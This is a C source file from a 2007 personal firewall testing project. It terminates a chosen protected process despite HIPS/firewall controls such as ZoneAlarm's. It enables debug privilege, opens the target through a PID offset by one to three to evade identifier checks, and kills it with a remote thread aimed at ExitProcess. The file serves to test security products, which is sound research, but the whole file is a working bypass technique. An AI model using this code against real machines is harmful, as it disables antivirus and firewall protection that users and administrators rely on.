/*

 Testing program for Bypassing PFW/HIPS open process control with uncommon identifier (BTP00000P000ZA)

 Usage:
 prog PID
   PID - process identifier - number (divisible by four) that uniquely identifies every running process

 Description:
 This program tries to terminate the process specified by PID. However, ZoneAlarm restricts calls 
 to TerminateProcess, hence CreateRemoteThread pointed to ExitProcess is used to achieve the goal. 
 The CreateRemoteThread call requires target process handle. This handle is obtained by the OpenProcess 
 call where the process identifier is set to PID+1, PID+2, or PID+3. If the target process is terminated, 
 the program reports success.

 Test:
 Running the testing program with the identifier of an arbitrary protected process as an argument.

*/

#include <stdio.h>
#include <windows.h>

void about(void)
{
  printf("Testing program for Bypassing PFW/HIPS open process control with uncommon identifier (BTP00000P000ZA)\n");
  printf("Windows Personal Firewall analysis project\n");
  printf("Copyright 2007 by Matousec - Transparent security\n");
  printf("http://www.matousec.com/""\n\n");
  return;
}

void usage(void)
{
  printf("Usage: test PID\n"
         "  PID - process identifier\n");
  return;
}

void print_last_error(void)
{
  LPTSTR buf;
  DWORD code=GetLastError();
  if (FormatMessage(FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_FROM_SYSTEM,NULL,code,0,(LPTSTR)&buf,0,NULL))
  {
    fprintf(stderr,"Error code: %ld\n",code);
    fprintf(stderr,"Error message: %s",buf);
    LocalFree(buf);
  } else fprintf(stderr,"Unable to format error message for code %ld.\n",code);
  return;
}


/*
 enable_privilege adds privilege to own token
 returns TRUE if succeed
*/

int enable_privilege(char *priv_name)
{
  DWORD res=0;
  HANDLE tok;
  LUID luid;
  TOKEN_PRIVILEGES privs;

  if (!OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY,&tok)) return 0;
  if (LookupPrivilegeValue(NULL,priv_name,&luid))
  {
    privs.PrivilegeCount=1;
    privs.Privileges[0].Luid=luid;
    privs.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED;
    DWORD ret_len;
    res=AdjustTokenPrivileges(tok,0,&privs,sizeof(TOKEN_PRIVILEGES),NULL,&ret_len);
    CloseHandle(tok);
  }
  return res;
}


/*
 enable_debug_privilege adds debug privilege to own token
 returns TRUE if succeed
*/

int enable_debug_privilege(void)
{
  return enable_privilege(SE_DEBUG_NAME);
}


int main(int argc,char **argv)
{
  about();
  enable_debug_privilege();

  ULONG pid;
  if ((argc!=2) || (!(pid=strtol(argv[1],NULL,10))))
  {
    usage();
    return 1;
  }

  LPTHREAD_START_ROUTINE exitproc=(LPTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandle("kernel32"),"ExitProcess");
  if (!exitproc)
  {
    fprintf(stderr,"Unable to find ExitProcess.\n");
    print_last_error();
    printf("\nTEST FAILED!\n");

    return 1;
  }


  for (int i=1;i<4;i++)
  {
    pid++;
    printf("Opening process using identifier PID+%d=%ld with PROCESS_ALL_ACCESS access rights.\n",i,pid);
    HANDLE h=OpenProcess(PROCESS_ALL_ACCESS,FALSE,pid);
    if (!h)
    {
      fprintf(stderr,"Unable to open process.\n");
      print_last_error();
      fprintf(stderr,"\n");
    } else
    {
      printf("Process opened: handle=0x%p\n",h);

      printf("Terminating process using CreateRemoteThread pointed to ExitProcess.\n");

      HANDLE rt=CreateRemoteThread(h,NULL,0,exitproc,NULL,0,NULL);
      if (rt)
      {
        printf("Remote thread created successfully.\n");

        WaitForSingleObject(rt,5000);

        DWORD exitcode;

        if (GetExitCodeProcess(h,&exitcode))
        {
          if (exitcode!=STILL_ACTIVE)
          {
            printf("\nTEST SUCCESSFUL!\n");
            CloseHandle(h);
            return 0;
          } else fprintf(stderr,"Remote thread failed to terminate target process.\n");
        } else
        {
          fprintf(stderr,"Unable to get process exit code.\n");
          print_last_error();
          fprintf(stderr,"\n");
        }
      } else
      {
        fprintf(stderr,"Unable to terminate process.\n");
        print_last_error();
        fprintf(stderr,"\n");
      }

      CloseHandle(h);
    }
  }

  printf("\nTEST FAILED!\n");
  return 1;
}
